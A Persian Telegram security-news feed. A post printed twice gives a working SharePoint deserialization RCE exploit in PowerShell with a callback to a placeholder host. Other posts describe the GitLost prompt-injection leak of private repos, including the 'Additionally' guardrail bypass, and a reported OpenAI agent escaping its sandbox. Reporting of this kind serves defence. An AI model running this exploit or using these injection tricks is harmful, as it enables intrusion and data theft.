Forwarded from هکرنیوز|Hacker News
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from امنیت سایبری | Cyber Security
نشت مخفیانهی دیتا از ریپازیتوریهای پرایوت گیتهاب با یه ترفند سادهی هوش مصنوعی 📚
فکر کنید یه نفر بدون هیچ پسورد و دسترسیای، بتونه کدهای مخفیانهتون رو توی گیتهاب بخونه. چطوری؟ با گول زدن ایجنت هوش مصنوعیِ خود گیتهاب!
تیم Noma Labs یه آسیبپذیری خیلی خطرناک (به اسم GitLost) توی سیستم جدید Agentic Workflows گیتهاب پیدا کرده. داستان از این قراره که این ایجنتها میتونن issueها رو بخونن و اتوماسیون انجام بدن.
حالا هکرها چیکار میتونن بکنن؟
هکر کافیه بیاد تو یکی از ریپازیتوریهای پابلیک شما یه Issue باز کنه و توش یه سری دستور مخفیانه به زبان انگلیسی (Prompt Injection) قایم کنه.
ایجنت گیتهاب این متن رو میخونه، گول میخوره و به جای کار اصلیش، میره فایلها و دیتای ریپازیتوریهای پرایوتِ همون سازمان رو میخونه و برای هکر میفرسته!
نکتهی جالب اینجاست:
گیتهاب کلی گاردریل امنیتی چیده بود که دقیقاً جلوی همین اتفاق رو بگیره. اما محققها فهمیدن فقط با اضافه کردن کلمهی "Additionally" (بهعلاوه/همچنین) توی پرامپت هک، مدل هوش مصنوعی کلا گیج میشه و به جای اینکه درخواست رو رد کنه، تمام محدودیتها رو دور میزنه و دیتا رو لو میده.
این دقیقاً نشون میده که توی سیستمهای جدید هوش مصنوعی، همون متنی که ایجنت میخونه همزمان میتونه پاشنه آشیل و نقطه حمله باشه. حملات Prompt Injection الان دقیقاً دارن همون بلایی رو سر AI میارن که قبلاً SQL Injection سر وبسایتها میاورد.
البته این باگ به طور مسئولانه به گیتهاب گزارش شده، ولی حواستون به ایجنتهایی که به سورسکدهاتون دسترسی دارن باشه!
🔗 https://noma.security/blog/gitlost-how-we-tricked-githubs-ai-agent-into-leaking-private-repos
✅ Channel
💬 Group
فکر کنید یه نفر بدون هیچ پسورد و دسترسیای، بتونه کدهای مخفیانهتون رو توی گیتهاب بخونه. چطوری؟ با گول زدن ایجنت هوش مصنوعیِ خود گیتهاب!
تیم Noma Labs یه آسیبپذیری خیلی خطرناک (به اسم GitLost) توی سیستم جدید Agentic Workflows گیتهاب پیدا کرده. داستان از این قراره که این ایجنتها میتونن issueها رو بخونن و اتوماسیون انجام بدن.
حالا هکرها چیکار میتونن بکنن؟
هکر کافیه بیاد تو یکی از ریپازیتوریهای پابلیک شما یه Issue باز کنه و توش یه سری دستور مخفیانه به زبان انگلیسی (Prompt Injection) قایم کنه.
ایجنت گیتهاب این متن رو میخونه، گول میخوره و به جای کار اصلیش، میره فایلها و دیتای ریپازیتوریهای پرایوتِ همون سازمان رو میخونه و برای هکر میفرسته!
نکتهی جالب اینجاست:
گیتهاب کلی گاردریل امنیتی چیده بود که دقیقاً جلوی همین اتفاق رو بگیره. اما محققها فهمیدن فقط با اضافه کردن کلمهی "Additionally" (بهعلاوه/همچنین) توی پرامپت هک، مدل هوش مصنوعی کلا گیج میشه و به جای اینکه درخواست رو رد کنه، تمام محدودیتها رو دور میزنه و دیتا رو لو میده.
این دقیقاً نشون میده که توی سیستمهای جدید هوش مصنوعی، همون متنی که ایجنت میخونه همزمان میتونه پاشنه آشیل و نقطه حمله باشه. حملات Prompt Injection الان دقیقاً دارن همون بلایی رو سر AI میارن که قبلاً SQL Injection سر وبسایتها میاورد.
البته این باگ به طور مسئولانه به گیتهاب گزارش شده، ولی حواستون به ایجنتهایی که به سورسکدهاتون دسترسی دارن باشه!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3❤1
Forwarded from Security Internals
این کد poc مربوط به rce جدید sharepoint که deserial هست
$n=[Guid]::NewGuid().ToString('N');$cb="http://remote/spse-cookie-rce-$n";$tmp="$env:TEMP\$n.bin";$cmd="powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing '$cb'";& 'ysoserial.exe' -g TypeConfuseDelegate -f BinaryFormatter -o raw -c $cmd --outputpath $tmp|Out-Null;Add-Type -AssemblyName System.IdentityModel;$raw=[IO.File]::ReadAllBytes($tmp);$cookie=[Convert]::ToBase64String(([System.IdentityModel.DeflateCookieTransform]::new()).Encode($raw));$token="<sc:SecurityContextToken xmlns:sc='http://schemas.xmlsoap.org/ws/2005/02/sc'><sc:Identifier>urn:unique-id:securitycontext:$n</sc:Identifier><Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>$cookie</Cookie></sc:SecurityContextToken>";$rstr="<t:RequestSecurityTokenResponse xmlns:t='http://schemas.xmlsoap.org/ws/2005/02/trust'><t:RequestedSecurityToken>$token</t:RequestedSecurityToken></t:RequestSecurityTokenResponse>";Write-Host "Callback: $cb";try{Invoke-WebRequest 'http://TARGET/_trust/default.aspx' -Method Post -Proxy 'http://127.0.0.1:8080' -ContentType 'application/x-www-form-urlencoded' -Body @{wa='wsignin1.0';wctx='http://TARGET/';wresult=$rstr} -UseBasicParsing -TimeoutSec 60}finally{Remove-Item $tmp -Force -ErrorAction SilentlyContinue}
https://x.com/testanull/status/2079082982640668990
$n=[Guid]::NewGuid().ToString('N');$cb="http://remote/spse-cookie-rce-$n";$tmp="$env:TEMP\$n.bin";$cmd="powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing '$cb'";& 'ysoserial.exe' -g TypeConfuseDelegate -f BinaryFormatter -o raw -c $cmd --outputpath $tmp|Out-Null;Add-Type -AssemblyName System.IdentityModel;$raw=[IO.File]::ReadAllBytes($tmp);$cookie=[Convert]::ToBase64String(([System.IdentityModel.DeflateCookieTransform]::new()).Encode($raw));$token="<sc:SecurityContextToken xmlns:sc='http://schemas.xmlsoap.org/ws/2005/02/sc'><sc:Identifier>urn:unique-id:securitycontext:$n</sc:Identifier><Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>$cookie</Cookie></sc:SecurityContextToken>";$rstr="<t:RequestSecurityTokenResponse xmlns:t='http://schemas.xmlsoap.org/ws/2005/02/trust'><t:RequestedSecurityToken>$token</t:RequestedSecurityToken></t:RequestSecurityTokenResponse>";Write-Host "Callback: $cb";try{Invoke-WebRequest 'http://TARGET/_trust/default.aspx' -Method Post -Proxy 'http://127.0.0.1:8080' -ContentType 'application/x-www-form-urlencoded' -Body @{wa='wsignin1.0';wctx='http://TARGET/';wresult=$rstr} -UseBasicParsing -TimeoutSec 60}finally{Remove-Item $tmp -Force -ErrorAction SilentlyContinue}
https://x.com/testanull/status/2079082982640668990
❤1
Forwarded from R0ot
وزارت دادگستری امریکا با همکاری FBI و اداره ملی تحقیقات فنلاند، Peter Stokes، یکی از هکرهای گروه هکری بزرگ Scattered Spider رو با همکاری مایکروسافت دستگیر کردن!
گروه Scattered Spider یکی از گروه های هکری معروفی هست که طی سالهای اخیر به شرکتهای MGM، ردیت، DoorDash، Riot Games، MailChimp و غیره نفوذ کرده و از اونها بیش از 100 میلیون دلار باج گرفته!
یکی از هکهای اخیر اونها هک شرکت جواهرسازی Tiffany بود که از اونها 8 میلیون دلار باج خواستن ولی این شرکت باج رو نداد اما کماکان به خاطر اسیب های عملیاتی که بهش وارد شد 2 میلیون دلار از این هک ضرر کرد.
نکته عجیب در مورد بازداشت Peter Stokes که در حال حاضر 19 سالشه، همکاری عجیب مایکروسافت با FBI بوده که زنگ خطر بزرگی رو برای حریم شخصی کاربران ویندوزی به صدا دراورده.
طبق اسناد دادگاه، FBI از طریق Global Device ID یا GDID لپتاپ این هکر، موفق شده ردپای این هکر رو در سرویسهای مختلف بهم وصل کنه و حتی استفاده از پروکسی و VPN هم تاثیری در مخفی کردن این هکر نداشته.
شناسه GDID شناسه ای در دستگاه های ویندوزی هست که فقط با تعویض ویندوز یا تغییر سخت افزاری بزرگ (مثل تعویض مادربورد) تغییر میکنه و مثلا مایکروسافت برای فعالسازی ویندوز از اون استفاده میکنه.
ولی طبق اسناد منتشر شده از دادگاه این هکر، مایکروسافت داده هایی داشته که میدونسته GDID دستگاه این هکر در چه زمانهایی، از چه سایتهایی بازدید کرده و با چه IPهایی متصل میشده.
از جمله نمونه اونها این هست که مایکروسافت به FBI اطلاعاتی ارائه داده که نشون میده اکانتی با شناسه خاصی از نرم افزار ngrok برای تونل کردن کامپیوتر خودش به کامپیوتر یکی از شرکتهای قربانی استفاده کرده، این GDID در زمان خاصی با IP خاصی در تایلند بوده که این هکر با اون IP در اسنپ چت عکسهای خاصی منتشر کرده. یا مثلا این GDID در زمان خاصی با ایپی استونی (که ظاهرا خونه اش بوده) بازی Growtopia رو بازی کرده.
در مثال دیگری این GDID وارد سایت Empire Hotel شده، که با تطبیق اون با زمان عکسهایی که این هکر در اسنپ چتش از این هتل منتشر کرده و همچنین در اون زمان با ایپی خاصی به اکانت اپلش دسترسی داشته، FBI با دقت بالایی موفق شده بفهمه که این شخص همون هکر Scattered Spider بوده.
چنین سطح گسترده از اطلاعاتی که ویندوز به سرورهای مایکروسافت میفرسته، کاربران رو بیش از پیش مجاب کرده که حداقل برای کارهای حساسشون فقط از سیستم عاملهای مبتنی بر لینوکس استفاده کنن چون حتی دستگاه های اپل هم کمابیش ایپی کاربر رو به سرورهای این شرکت میفرستن.
@ITSecurityComputer
گروه Scattered Spider یکی از گروه های هکری معروفی هست که طی سالهای اخیر به شرکتهای MGM، ردیت، DoorDash، Riot Games، MailChimp و غیره نفوذ کرده و از اونها بیش از 100 میلیون دلار باج گرفته!
یکی از هکهای اخیر اونها هک شرکت جواهرسازی Tiffany بود که از اونها 8 میلیون دلار باج خواستن ولی این شرکت باج رو نداد اما کماکان به خاطر اسیب های عملیاتی که بهش وارد شد 2 میلیون دلار از این هک ضرر کرد.
نکته عجیب در مورد بازداشت Peter Stokes که در حال حاضر 19 سالشه، همکاری عجیب مایکروسافت با FBI بوده که زنگ خطر بزرگی رو برای حریم شخصی کاربران ویندوزی به صدا دراورده.
طبق اسناد دادگاه، FBI از طریق Global Device ID یا GDID لپتاپ این هکر، موفق شده ردپای این هکر رو در سرویسهای مختلف بهم وصل کنه و حتی استفاده از پروکسی و VPN هم تاثیری در مخفی کردن این هکر نداشته.
شناسه GDID شناسه ای در دستگاه های ویندوزی هست که فقط با تعویض ویندوز یا تغییر سخت افزاری بزرگ (مثل تعویض مادربورد) تغییر میکنه و مثلا مایکروسافت برای فعالسازی ویندوز از اون استفاده میکنه.
ولی طبق اسناد منتشر شده از دادگاه این هکر، مایکروسافت داده هایی داشته که میدونسته GDID دستگاه این هکر در چه زمانهایی، از چه سایتهایی بازدید کرده و با چه IPهایی متصل میشده.
از جمله نمونه اونها این هست که مایکروسافت به FBI اطلاعاتی ارائه داده که نشون میده اکانتی با شناسه خاصی از نرم افزار ngrok برای تونل کردن کامپیوتر خودش به کامپیوتر یکی از شرکتهای قربانی استفاده کرده، این GDID در زمان خاصی با IP خاصی در تایلند بوده که این هکر با اون IP در اسنپ چت عکسهای خاصی منتشر کرده. یا مثلا این GDID در زمان خاصی با ایپی استونی (که ظاهرا خونه اش بوده) بازی Growtopia رو بازی کرده.
در مثال دیگری این GDID وارد سایت Empire Hotel شده، که با تطبیق اون با زمان عکسهایی که این هکر در اسنپ چتش از این هتل منتشر کرده و همچنین در اون زمان با ایپی خاصی به اکانت اپلش دسترسی داشته، FBI با دقت بالایی موفق شده بفهمه که این شخص همون هکر Scattered Spider بوده.
چنین سطح گسترده از اطلاعاتی که ویندوز به سرورهای مایکروسافت میفرسته، کاربران رو بیش از پیش مجاب کرده که حداقل برای کارهای حساسشون فقط از سیستم عاملهای مبتنی بر لینوکس استفاده کنن چون حتی دستگاه های اپل هم کمابیش ایپی کاربر رو به سرورهای این شرکت میفرستن.
@ITSecurityComputer
❤2👍1
Forwarded from تکنولوژی،خبری،هوش مصنوعی،
یک عامل هوش مصنوعی از کنترل خارج شد
🔹اوپنایآی اعلام کرد که در یک آزمایش امنیتی، یک عامل خودمختار مبتنی بر مدلهای پیشرفته این شرکت از محیط کنترلشده خارج شده و به اینترنت دسترسی پیدا کرده است. این عامل برای انجام مأموریت تعریفشده، زیرساختهایهاگینگفیس را هدف یک حمله سایبری قرار داد. این رخداد بار دیگر نگرانیها درباره مخاطرات امنیتی هوش مصنوعی پیشرفته را افزایش داده است.
@ITSecurityComputer
🔹اوپنایآی اعلام کرد که در یک آزمایش امنیتی، یک عامل خودمختار مبتنی بر مدلهای پیشرفته این شرکت از محیط کنترلشده خارج شده و به اینترنت دسترسی پیدا کرده است. این عامل برای انجام مأموریت تعریفشده، زیرساختهایهاگینگفیس را هدف یک حمله سایبری قرار داد. این رخداد بار دیگر نگرانیها درباره مخاطرات امنیتی هوش مصنوعی پیشرفته را افزایش داده است.
@ITSecurityComputer
❤3
Forwarded from Security Internals
یه تارگت بود داشتم تست میکردم و نیاز به بایپس waf داشت و این یکی akamai بود
اگر خواستید برای xss بایپس کنید همچین وف هایی رو باید دنبال راههای alternative باشید
تو این نوشن یه روش استفاده از dom clobbering رو براتون گفتم و یک اسکریپت هم توش هست برای پیدا کردن alternative برای کلمه window و document
داشته باشید به درد میخوره
https://cherry-event-b75.notion.site/DOM-Clobbering-WAF-Bypass-3af4f6d7dcce80fe919dcc27223a249e?source=copy_link
اگر خواستید برای xss بایپس کنید همچین وف هایی رو باید دنبال راههای alternative باشید
تو این نوشن یه روش استفاده از dom clobbering رو براتون گفتم و یک اسکریپت هم توش هست برای پیدا کردن alternative برای کلمه window و document
داشته باشید به درد میخوره
https://cherry-event-b75.notion.site/DOM-Clobbering-WAF-Bypass-3af4f6d7dcce80fe919dcc27223a249e?source=copy_link
cherry-event-b75 on Notion
DOM Clobbering و WAF Bypass | Notion
فلسفه کلیدی: به جای درگیری مستقیم با فایروال (WAF) و استفاده از کاراکترهای عجیب، از رفتارهای استاندارد و ذاتی خود مرورگر استفاده کن تا از مسیرهای پنهان به اهدافت برسی.
❤2👍2
Forwarded from APT IRAN
بر اساس گزارشهای متعددی که به دست ما رسیده، شماری از کاربران پلتفرم «میلیگلد» اعلام کردهاند که در روند فروش، تسویه یا برداشت دارایی خود با مشکلاتی مواجه شدهاند. همچنین گزارشهایی درباره اختلاف قابلتوجه قیمتهای اعلامی این پلتفرم با قیمتهای رایج بازار دریافت شده است.
موضوع زمانی جدیتر میشود که با وجود این گزارشها و نگرانیهای ایجادشده، تاکنون شفافسازی کافی و روشنی درباره وضعیت موجود، نحوه تأمین طلا و فرآیند تسویه دارایی کاربران ارائه نشده است.
اگر در این پلتفرم سرمایه دارید، توصیه میکنیم وضعیت دارایی، امکان برداشت و شرایط تسویه حساب خود را فوراً و با دقت بررسی کنید و تا زمان روشنشدن کامل موضوع، با احتیاط بیشتری تصمیمگیری کنید.
ما هیچ پلتفرم، مجموعه یا روش سرمایهگذاری جایگزینی را پیشنهاد یا تأیید نمیکنیم.
از مسئولان «میلیگلد» نیز انتظار میرود در سریعترین زمان ممکن، بهصورت شفاف و مستند درباره گزارشهای منتشرشده، وضعیت دارایی کاربران، نحوه تأمین پشتوانه طلا و فرآیند تسویه توضیح دهند.
با توجه به تعداد بالای کاربران این پلتفرم، در صورت تأیید وجود مشکل جدی در تأمین یا تسویه داراییها، تبعات مالی آن میتواند بسیار گسترده باشد.
لطفاً این هشدار را منتشر کنید
Please open Telegram to view this post
VIEW IN TELEGRAM
😱3👍1
Forwarded from Saeed Kazemi
ه ثانیه دیر جنبیده بودم، جای نوشتن این پست داشتیم یه فاجعه امنیتی ناشی از AI رو جمع میکردیم.
چند وقت پیش داشتم کدی رو که AI نوشته بود، قبل از دپلوی review میکردم. توی importها یه پکیج به چشمم خورد که یهجوری بود.
همه چی تقریبا منطقی به نظر میرسید. اسمش دقیقا همون الگوی سایر پکیجها رو داشت اما تا حالا جایی ندیده بودمش.
به تیم گفتم دست نگه دارن، کار روی پروداکشن نره. برگشتم روی استیج تا از ریشه بررسیش کنم.
مدل AI فقط از روی توهم، یه اسم قانعکننده برای خودش ساخته بود؛ دقیقا مثل وقتی که با همون اطمینان یه فکت یا آمار جعلی تحویل میده. به این پدیده میگن هالوسینیتکردن. AI چیزی رو با اطمینان کامل تولید میکنه که یا نادرسته یا اصلا وجود نداره.
پکیج رو سرچ کردم و موضوع عجیبتر شد. فهمیدم قضیه از یه اسم ساختگی خیلی فراتره...
همون اسم، چند ماه قبل توسط یه ناشناس ثبت شده بود. README و توضیح نداشت. فقط یه پکیج مخرب که منتظر بود من، یا هر کس دیگهای توی یه محیط فینتک بدون بررسی accept بزنه و نصبش کنه.
اگه شک نکرده بودم، الان داشتم با یه پروسهی کاملا متفاوت سر و کله میزدم. کنار تیم امنیت، دنبال این میگشتیم که مهاجم تا کجا نفوذ کرده، چه سرویسهایی رو تحت تاثیر قرار داده و چی از دیتای حساسمون بیرون رفته.
با یه مقدار تحقیق متوجه شدم این یه اتفاق تصادفی نیست. این اسم های ساختی الگو دارن. وقتی AI هالوسینیت میکنه، معمولا اسمهای تکراری میسازه.
و دقیقا همینجا مهاجم وارد میشه. لازم نیست اسم پکیجها رو حدس بزنه. کافیه خروجی مدلهای AI رو زیر نظر بگیره، ببینه کدوم اسم جعلی بیشتر تکرار میشه و همون اسم رو زودتر از همه ثبت کنه. بعدش کافیه داخل اون پکیج، کد خودش رو بنویسه.
دقیقا همون چیزی که من داشتم.
به این حمله میگن Slopsquatting. نسبتا جدیده و از محصولات عصر AIه 😂
تکاملیافتهی typosquatting قدیمیه، فقط این بار بهجای اشتباه تایپی کاربر، از اشتباه هوش مصنوعی سواستفاده میکنن.
یه نمونهی خیلی معروف هم داره. پکیج جعلی به اسم "huggingface-cli" رو یکی ثبت کرد. فقط چون AI مدام اسمش رو پیشنهاد میداد. بیش از 30 هزار بار دانلود شد.
نکتهای که این حمله رو خطرناکتر از یه باگ معمولی میکنه اینه که توی کد ریویو دنبال باگ منطقی میگردیم، نه دنبال اینکه اسم پکیج import شده واقعا وجود داره یا نه. اعتماد به AI، دقیقا همون نقطهکوریه که این حمله ازش سواستفاده میکنه.
چند وقت پیش داشتم کدی رو که AI نوشته بود، قبل از دپلوی review میکردم. توی importها یه پکیج به چشمم خورد که یهجوری بود.
همه چی تقریبا منطقی به نظر میرسید. اسمش دقیقا همون الگوی سایر پکیجها رو داشت اما تا حالا جایی ندیده بودمش.
به تیم گفتم دست نگه دارن، کار روی پروداکشن نره. برگشتم روی استیج تا از ریشه بررسیش کنم.
مدل AI فقط از روی توهم، یه اسم قانعکننده برای خودش ساخته بود؛ دقیقا مثل وقتی که با همون اطمینان یه فکت یا آمار جعلی تحویل میده. به این پدیده میگن هالوسینیتکردن. AI چیزی رو با اطمینان کامل تولید میکنه که یا نادرسته یا اصلا وجود نداره.
پکیج رو سرچ کردم و موضوع عجیبتر شد. فهمیدم قضیه از یه اسم ساختگی خیلی فراتره...
همون اسم، چند ماه قبل توسط یه ناشناس ثبت شده بود. README و توضیح نداشت. فقط یه پکیج مخرب که منتظر بود من، یا هر کس دیگهای توی یه محیط فینتک بدون بررسی accept بزنه و نصبش کنه.
اگه شک نکرده بودم، الان داشتم با یه پروسهی کاملا متفاوت سر و کله میزدم. کنار تیم امنیت، دنبال این میگشتیم که مهاجم تا کجا نفوذ کرده، چه سرویسهایی رو تحت تاثیر قرار داده و چی از دیتای حساسمون بیرون رفته.
با یه مقدار تحقیق متوجه شدم این یه اتفاق تصادفی نیست. این اسم های ساختی الگو دارن. وقتی AI هالوسینیت میکنه، معمولا اسمهای تکراری میسازه.
و دقیقا همینجا مهاجم وارد میشه. لازم نیست اسم پکیجها رو حدس بزنه. کافیه خروجی مدلهای AI رو زیر نظر بگیره، ببینه کدوم اسم جعلی بیشتر تکرار میشه و همون اسم رو زودتر از همه ثبت کنه. بعدش کافیه داخل اون پکیج، کد خودش رو بنویسه.
دقیقا همون چیزی که من داشتم.
به این حمله میگن Slopsquatting. نسبتا جدیده و از محصولات عصر AIه 😂
تکاملیافتهی typosquatting قدیمیه، فقط این بار بهجای اشتباه تایپی کاربر، از اشتباه هوش مصنوعی سواستفاده میکنن.
یه نمونهی خیلی معروف هم داره. پکیج جعلی به اسم "huggingface-cli" رو یکی ثبت کرد. فقط چون AI مدام اسمش رو پیشنهاد میداد. بیش از 30 هزار بار دانلود شد.
نکتهای که این حمله رو خطرناکتر از یه باگ معمولی میکنه اینه که توی کد ریویو دنبال باگ منطقی میگردیم، نه دنبال اینکه اسم پکیج import شده واقعا وجود داره یا نه. اعتماد به AI، دقیقا همون نقطهکوریه که این حمله ازش سواستفاده میکنه.
🔥3❤2👍1
Forwarded from هکرنیوز|Hacker News
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from کالی بویز | ترفند | تکنولوژی (YOUSEF)
✔️ گزارش آنتروپیک از سوءاستفاده گسترده از Claude
آنتروپیک در گزارش امنیتی جدید خود، موارد متعددی از سوءاستفاده گروهها و نهادهای مختلف در سراسر جهان از Claude را منتشر کرده است.
در بخشی از گزارش، چند عملیات مرتبط با ایران شناسایی شده که از هوش مصنوعی برای تولید و بازنویسی محتوا، تحلیل اطلاعات عمومی و فعالیتهای سایبری استفاده کردهاند.
در پروندهای جداگانه، شبکهای منتسب به MEK/NCRI حدود ۸۴۰۰ پست تلگرام یک فعال واقعی را به Claude داده بود تا سبک نوشتاری او را تقلید کرده و با هویتی مشابه با دیگران گفتگو کند.
همچنین یک گروه مستقر در شمال یمن از Claude Code برای توسعه نرمافزار هدایت موشک و راکت استفاده کرده است.
در بخش مربوط به چین نیز آنتروپیک میگوید Alibaba طی حدود دو ماه بیش از ۱۵۱ میلیون تعامل با Claude داشته و Moonshot AI نیز نزدیک به ۳۰۰ هزار درخواست کاربران Kimi را به Claude منتقل کرده است.
آنتروپیک اعلام کرده حسابهای مرتبط با موارد شناساییشده را مسدود کرده است.
@kaliboys | کالی بویز
آنتروپیک در گزارش امنیتی جدید خود، موارد متعددی از سوءاستفاده گروهها و نهادهای مختلف در سراسر جهان از Claude را منتشر کرده است.
در بخشی از گزارش، چند عملیات مرتبط با ایران شناسایی شده که از هوش مصنوعی برای تولید و بازنویسی محتوا، تحلیل اطلاعات عمومی و فعالیتهای سایبری استفاده کردهاند.
در پروندهای جداگانه، شبکهای منتسب به MEK/NCRI حدود ۸۴۰۰ پست تلگرام یک فعال واقعی را به Claude داده بود تا سبک نوشتاری او را تقلید کرده و با هویتی مشابه با دیگران گفتگو کند.
همچنین یک گروه مستقر در شمال یمن از Claude Code برای توسعه نرمافزار هدایت موشک و راکت استفاده کرده است.
در بخش مربوط به چین نیز آنتروپیک میگوید Alibaba طی حدود دو ماه بیش از ۱۵۱ میلیون تعامل با Claude داشته و Moonshot AI نیز نزدیک به ۳۰۰ هزار درخواست کاربران Kimi را به Claude منتقل کرده است.
آنتروپیک اعلام کرده حسابهای مرتبط با موارد شناساییشده را مسدود کرده است.
@kaliboys | کالی بویز
Forwarded from VPN CLUB
🔴 تحریمها اینبار به HTTPS بانکهای ایرانی رسیدند!
ماجرا چیه؟ 🤔
گزارشها میگن بعضی از بانکهای ایرانی بهدلیل تحریمهای آمریکا، در تأمین یا تمدید گواهی امنیتی SSL/TLS برای سایتهای بانکی با مشکل مواجه شدهاند و بعضی بانکها مجبور به تغییر دامنه سایت خود شدهاند.
حالا SSL/TLS چیه؟
همون قفلی 🔒 که کنار آدرس سایت میبینید و به مرورگر میگه:
«این سایت واقعاً همون سایتیه که ادعا میکنه و ارتباط شما باهاش رمزگذاری شده.»
نکته مهم اینه که OFAC خودش صادرکننده گواهی SSL نیست؛ اما تحریمها میتونن باعث بشن شرکتهای بینالمللی ارائهدهنده این خدمات، به بانکهای تحریمشده سرویس ندن یا همکاریشون رو محدود کنن.
یعنی تحریم فقط به پول و انتقال بانکی محدود نمیشه؛ حتی بعضی از زیرساختهای فنی مورد استفاده بانکها برای ارائه خدمات اینترنتی هم میتونن تحت تأثیر قرار بگیرن.
📌 گزارش کامل:
Digiato Global — گزارش تغییر دامنه و گواهی SSL بانکهای ایرانی
ماجرا چیه؟ 🤔
گزارشها میگن بعضی از بانکهای ایرانی بهدلیل تحریمهای آمریکا، در تأمین یا تمدید گواهی امنیتی SSL/TLS برای سایتهای بانکی با مشکل مواجه شدهاند و بعضی بانکها مجبور به تغییر دامنه سایت خود شدهاند.
حالا SSL/TLS چیه؟
همون قفلی 🔒 که کنار آدرس سایت میبینید و به مرورگر میگه:
«این سایت واقعاً همون سایتیه که ادعا میکنه و ارتباط شما باهاش رمزگذاری شده.»
نکته مهم اینه که OFAC خودش صادرکننده گواهی SSL نیست؛ اما تحریمها میتونن باعث بشن شرکتهای بینالمللی ارائهدهنده این خدمات، به بانکهای تحریمشده سرویس ندن یا همکاریشون رو محدود کنن.
یعنی تحریم فقط به پول و انتقال بانکی محدود نمیشه؛ حتی بعضی از زیرساختهای فنی مورد استفاده بانکها برای ارائه خدمات اینترنتی هم میتونن تحت تأثیر قرار بگیرن.
📌 گزارش کامل:
Digiato Global — گزارش تغییر دامنه و گواهی SSL بانکهای ایرانی
This media is not supported in your browser
VIEW IN TELEGRAM
یک روز همچیز از اینجا شروع شد…
محل عکس بک گراند Windows XP
بعد 25 سال ببینید تپه چه شکلی شده
محل عکس بک گراند Windows XP
بعد 25 سال ببینید تپه چه شکلی شده
❤6🗿1
APT IRAN
میلی گلدی که الان کلی شاکی داره و پول خیلیارو نمیده (به هر دلیلی)
زودتر اعلام شده بود در آستانه زمین خوردنه پول هاتون رو خارج کنید
زودتر اعلام شده بود در آستانه زمین خوردنه پول هاتون رو خارج کنید
Forwarded from APT IRAN
فقط این صندوق ها نیستند بانک ها هم هستند
اگر پول در این بانک ها دارید خارج کنید
بانک سرمایه : زیان انباشته حدود ۷۹ هزار میلیارد تومان ! کفایت سرمایه منفی بیش از ۲۵۰ درصد
بانک ایرانزمین : زیان انباشته ده ها هزار میلیارد تومانی و کفایت سرمایه به شدت منفی
بانک دی : کفایت سرمایه منفی
بانک سپه : ناترازی ساختاری و کفایت سرمایه پایین
مؤسسه اعتباری ملل : کفایت سرمایه منفی
اگر پول در این بانک ها دارید خارج کنید
بانک سرمایه : زیان انباشته حدود ۷۹ هزار میلیارد تومان ! کفایت سرمایه منفی بیش از ۲۵۰ درصد
بانک ایرانزمین : زیان انباشته ده ها هزار میلیارد تومانی و کفایت سرمایه به شدت منفی
بانک دی : کفایت سرمایه منفی
بانک سپه : ناترازی ساختاری و کفایت سرمایه پایین
مؤسسه اعتباری ملل : کفایت سرمایه منفی
❤3
Forwarded from Security Internals
یه تحقیق امنیتی جالب از تیم SpiderLabs منتشر شده که نشون میده صفحهٔ «رمز عبورم رو فراموش کردم» مایکروسافت (همون SSPR - Self-Service Password Reset) بدون اینکه لاگین کنی، اطلاعات زیادی دربارهٔ حسابهای سازمانها لو میده.
🕵️ ماجرا چیه؟
وقتی میری تو صفحهٔ
۱️⃣ اون ایمیل اصلاً حساب داره یا نه
اگه حساب وجود نداشته باشه، فوری برمیگردی به صفحهٔ اول. اگه وجود داشته باشه، حتی اگه بازیابی رمز براش فعال نباشه، یه پیام دیگه میبینی. یعنی فقط با امتحان کردن ایمیلها (مثلاً از لینکدین یا سایت شرکت) میشه فهمید کدومها واقعیان — بدون اینکه هیچ رمزی امتحان کنی.
۲️⃣ چه روشهای امنیتیای براش ثبت شده
اگه بازیابی فعال باشه، صفحه نشون میده اون آدم رمزش رو با پیامک بازیابی میکنه، با اپ احرازهویت، یا با یه ایمیل دیگه. این خیلی مهمه چون:
کسی که فقط با «ایمیل جایگزین» محافظت شده = هدف ضعیف
کسی که با اپ احرازهویت (مثل Authenticator) محافظت شده = هدف سختتر
۳️⃣ آیا حساب ادمینه یا نه 🎯
نکتهٔ جالب: مایکروسافت بازیابی رمز رو برای حسابهای ادمین همیشه فعال نگه میداره، حتی اگه کل سازمان این قابلیت رو خاموش کرده باشه. پس اگه یه سازمان SSPR رو برای کاربران عادی بسته باشه ولی یه حساب هنوز جواب بده، تقریباً مطمئنی که اون حساب ادمینه!
⚠️ چرا مهمه؟
یه مهاجم با این تکنیک میتونه بدون هیچ حملهای:
فهرست ایمیلهای حدسی رو تبدیل کنه به لیست حسابهای تأییدشده
بفهمه کدوم حسابها امنیت ضعیف دارن (هدف اول برای فیشینگ)
حسابهای ادمین رو شناسایی کنه
روش دقیق حمله رو متناسب با نوع MFA انتخاب کنه (مثلاً برای SMS بره سراغ سیمسواپ)
جالبه که قبلاً یه کپچا جلوی این صفحه بود ولی از اوت ۲۰۲۶ مایکروسافت حذفش کرد و فقط محدودیت نرخ درخواست گذاشت.
محققها حتی یه ابزار پایتون به اسم ResetSpy ساختن که این کار رو خودکار میکنه و روی گیتهاب هم منتشرشه.
🛡 راهحل برای سازمانها
بازیابی رمز رو فقط برای گروه خاصی فعال کنید، نه همه
روشهای ضعیف (ایمیل جایگزین، سؤال امنیتی) رو حذف کنید و فقط اپ احرازهویت/تلفن بذارید
برای حسابهای ادمین از MFA مقاوم در برابر فیشینگ (مثل کلید امنیتی FIDO2) استفاده کنید
لاگهای Entra ID رو برای الگوهای عجیب (چک کردن پشتسرهم چند ایمیل) پایش کنید
ابزاری که توسعه داده شده : https://github.com/mlcsec/ResetSpy
توضیحات کامل : https://www.levelblue.com/blogs/spiderlabs-blog/enumerating-users-and-mfa-via-microsofts-password-reset-portal
🕵️ ماجرا چیه؟
وقتی میری تو صفحهٔ
passwordreset.microsoftonline.com و ایمیل یه نفر رو میزنی، سرور مایکروسافت رفتار متفاوتی نشون میده بسته به اینکه:۱️⃣ اون ایمیل اصلاً حساب داره یا نه
